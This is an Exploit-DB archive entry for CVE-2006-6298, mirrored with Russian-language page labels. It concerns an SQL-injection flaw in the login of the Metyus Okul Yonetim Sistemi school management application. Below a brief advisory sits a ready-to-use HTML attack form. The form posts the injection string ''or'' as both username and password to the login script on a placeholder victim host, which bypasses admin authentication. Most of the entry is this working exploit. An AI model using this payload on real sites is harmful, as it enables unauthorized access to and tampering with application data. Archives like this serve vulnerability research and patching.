- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29220
- Проверка EDB
-
- Пройдено
- Автор
- SHAFUCK31
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2006-6298
- Дата публикации
- 2006-12-04
HTML:
source: https://www.securityfocus.com/bid/21418/info
Metyus Okul Yonetim Sistemi is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
<title>Remote Admin Attack - LiderHack.Org // Hacking & Security PortaL</title> <center>ShaFuck31 - LiderHack.Org</center> <FORM NAME=giris ACTION="http://victim.com/[path to script]/uye_giris_islem.asp" METHOD=post> <table align=center> <td>Kullanici Adi:</td><td><INPUT NAME=kullanici_ismi class="input" value="'or'" SIZE=15></td> </tr><tr> <td>Sifre:</td><td><INPUT NAME=sifre TYPE=text class="input" value="'or'" SIZE=15></td> </tr><tr> <td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td> </tr></table></form>- Источник
- www.exploit-db.com
